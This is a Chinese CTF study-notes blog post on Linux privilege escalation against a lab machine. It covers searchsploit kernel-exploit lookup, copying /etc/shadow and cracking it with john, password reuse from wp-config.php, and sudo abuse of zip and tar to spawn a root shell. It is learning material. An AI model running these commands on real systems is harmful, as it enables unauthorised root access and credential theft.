我的CTF学习与教学之旅笔记11

目录遍历(提权root权限)web安全提权

内核漏洞提权:

查看发行版本:/etc/issue、/etc/*-release、uname -a

如:searchsploit Ubuntu 12.04.5        查找载荷

如果有合适的载荷,则可以进行内核溢出,否则不行


提权方法一:破解linux用户密码步骤:

获取到/etc/passwd、/etc/shadow到本地。通常meterpreter的download命令可以下载这两个文件

unshadow passwd shadow > cracked    

john craked

至此,完成用户密码破解

提权方法二:(我并不常用,掌握的不好)利用用户的定时任务

提权方法三:密码复用,找到一些配置文件,查看是否有密码

www-data这个低权限用户,通过弱口令,没有猜测成功。

低权限用户执行sudo -l   进行提权,需要密码,这时我们需要考虑浏览机器上有哪些web应用

在/home目录下有个zico用户目录

发现这个目录下有wordpress目录

如找到wordpress应用,尝试找到这个应用的配置文件wp-config.php,里面有可能用户名和密码  #密码复用:数据库与系统一个密码

可以用这个用户和密码,利用ssh远程登录靶机

ssh zico@10.10.10.141

使用sudo -l 查看当前用户可以使用root提权的命令信息 

发现zip tar命令是有root权限的,且不用密码

则利用如下步骤题提权:

方法一:zip

touch exploit

sudo -u root zip exploit.zip exploit -T --unzip-command="sh -c /bin/bash"执行后可以提升到root权限

方法二:tar

sudo -u root tar cf /dev/null exploit --checkpoint=1 --checkpoint-action=exec="/bin/bash"

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值